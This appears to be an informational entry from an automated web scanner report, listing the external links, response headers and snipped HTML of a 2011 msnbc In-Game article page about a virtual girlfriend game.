<div class="avatar"><a href="http://windabenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/windabenedetti-1131361638.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">Follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.94. http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ingame.msnbc.msn.com
Path:	/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy

Issue detail

The page was loaded from a URL containing a query string:

http://ingame.msnbc.msn.com/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy?chromedomain=technolog

The response contains the following links to other domains:

http://3scruseloose.newsvine.com/
http://4570govt.newsvine.com/
http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://asterisk2267293.newsvine.com/
http://belzebu.newsvine.com/
http://bit.ly/caLhBE
http://calidudebeautifull.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://darthdon.newsvine.com/
http://dateline.msnbc.com/
http://davidam1262.newsvine.com/
http://devavo.newsvine.com/
http://dizzal.newsvine.com/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://duncandilnuts.newsvine.com/
http://goorganic2.newsvine.com/
http://hardball.msnbc.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://ingame.newsvine.com/
http://jtj.newsvine.com/
http://keith-1135394.newsvine.com/
http://kinjiru.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/ingame/style.css?v=23247
http://log.newsvine.com/poke.gif?x=0|26&get=c5916141&rand=301353978&do=msnbc.redacted&ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::
http://lovesssappsss.newsvine.com/
http://lovesssappsss1.newsvine.com/
http://marcusarilius.newsvine.com/
http://mikeamerson.newsvine.com/
http://mrwashburn.newsvine.com/
http://msmeredith.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://natalie-fl.newsvine.com/
http://nightly.msnbc.com/
http://nothappy2494184.newsvine.com/
http://ohmy999999.newsvine.com/
http://platform.twitter.com/widgets.js
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://redtape.msnbc.com/
http://robert8777.newsvine.com/
http://rodentrack.newsvine.com/
http://ronnkelley.newsvine.com/
http://roquemocan.newsvine.com/
http://rvanderbrink.newsvine.com/
http://sanescience.newsvine.com/
http://scifiwriter7203.newsvine.com/
http://swhitcomb1.newsvine.com/
http://tchoupitoulas1.newsvine.com/
http://tishomingokid.newsvine.com/
http://toastymcgrath.newsvine.com/
http://today.msnbc.com/
http://toddkenreck.newsvine.com/
http://tooquiet4me2005.newsvine.com/
http://tv.msnbc.com/
http://twitter.com/WindaBenedetti
http://twitter.com/share
http://twitter.com/windabenedetti
http://windabenedetti.newsvine.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy
http://www.facebook.com/todd.kenreck
http://www.hotmail.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.nytimes.com/2009/07/26/magazine/26FOB-2DLove-t.html
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/a13fb07a18e3230078b48aadd2b832aa48d9f59f.css?v=23247
http://www.polls.newsvine.com/_static/js/8279c89e6cbfbec39495cd10332ce1234f0aa2d8.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/b_star.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/windabenedetti-1131361638.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/wbenedetti/5917266.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://www.youtube.com/v/71ibW3ibkOI&hl=en_US&fs=1
http://xalener.newsvine.com/
http://yeenveen.newsvine.com/
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://twitter.com/ToddKenreck
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=278
Date: Sun, 30 Jan 2011 17:53:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109211

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>In-Game - 'My Virtual
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://ingame.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a13fb07a18e3230078b48aadd2b832aa48d9f59f.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/8279c89e6cbfbec39495cd10332ce1234f0aa2d8.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/ingame/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5916141&rand=301353978&do=msnbc.redacted&ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://ingame.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5917266" data-contentId="5917266" class="inlinePhoto photo_portrait photo_align_right user_inline_photo" style="width:319px;"><img id="wbenedetti/5917266.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/wbenedetti/5917266.jpg" width="319" height="478" alt="" />
...[SNIP]...
<p>It seems we here in the U.S. are sliding down the slippery slope toward the kind of infatuation with <a target="_blank" href="http://www.nytimes.com/2009/07/26/magazine/26FOB-2DLove-t.html">virtual</a> and <a target="_blank" href="http://www.nytimes.com/2009/07/26/magazine/26FOB-2DLove-t.html">stuffed girlfriends</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/71ibW3ibkOI&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div id="vine-inlineCode__5916158" class="inlineCode photo_align_block" data-contentid="5916158"><object width="592" height="346" id="msnbc365677" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0"><param name="movie" value="http://www.msnbc.redacted/id/32545640" />
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><em>
...[SNIP]...
</em><a target="_blank" href="http://twitter.com/WindaBenedetti"><em>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy" data-Text="'My Virtual Girlfriend' is real-world creepy">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://scifiwriter7203.newsvine.com/">scifiwriter7203</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://natalie-fl.newsvine.com/">Hot-in-Miami</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<div class="normal"><a href="http://DevAvo.newsvine.com/">DevAvo</a>
...[SNIP]...
<div class="normal"><a href="http://swhitcomb1.newsvine.com/">Sean-336944</a>
...[SNIP]...
<div class="normal"><a href="http://Dizzal.newsvine.com/">minnysotaboy</a>
...[SNIP]...
<div class="normal"><a href="http://sanescience.newsvine.com/">Sanescience</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Lovesssappsss.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Lovesssappsss.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://duncandilnuts.newsvine.com/">Antonio V</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://roquemocan.newsvine.com/">rmocan</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://lovesssappsss1.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://3scruseloose.newsvine.com/">3scruseloose</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Asterisk2267293.newsvine.com/">Asterisk-2267293</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://xalener.newsvine.com/">xalener</a>
...[SNIP]...
<div class="normal"><a href="http://tchoupitoulas1.newsvine.com/">Tchoupitoulas</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://lovesssappsss1.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://keith-1135394.newsvine.com/">keith-1135394</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://goorganic2.newsvine.com/">go organic</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Calidudebeautifull.newsvine.com/">Calidude69bella</a>
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
<div class="normal"><a href="http://Dizzal.newsvine.com/">minnysotaboy</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://rvanderbrink.newsvine.com/">PuddleDuck</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://rodentrack.newsvine.com/">Rodentrack</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://ToastyMcGrath.newsvine.com/">Toasty McGrath</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://4570govt.newsvine.com/">2blunt4drivels</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://belzebu.newsvine.com/">Belzebu</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://tooquiet4me2005.newsvine.com/">MS in VA</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://davidam1262.newsvine.com/">david1262</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MsMeredith.newsvine.com/">Ms.Meredith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://goorganic2.newsvine.com/">go organic</a>
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
<div class="normal"><a href="http://Kinjiru.newsvine.com/">Kinjiru</a>
...[SNIP]...
<div class="normal"><a href="http://jtj.newsvine.com/">JIM-254362</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Dizzal.newsvine.com/">minnysotaboy</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Marcusarilius.newsvine.com/">Marcusarilius</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ronnkelley.newsvine.com/">Truckin Ronn</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://mrwashburn.newsvine.com/">mrwashburn</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://YeenVeen.newsvine.com/">YeenVeen</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Kinjiru.newsvine.com/">Kinjiru</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
<div class="normal"><a href="http://TishomingoKid.newsvine.com/">skip Nicholson, Oklahoma City</a>
...[SNIP]...
<div class="normal"><a href="http://robert8777.newsvine.com/">Robert8777</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://nothappy2494184.newsvine.com/">nothappy-2494184</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://windabenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/windabenedetti-1131361638.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">Follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
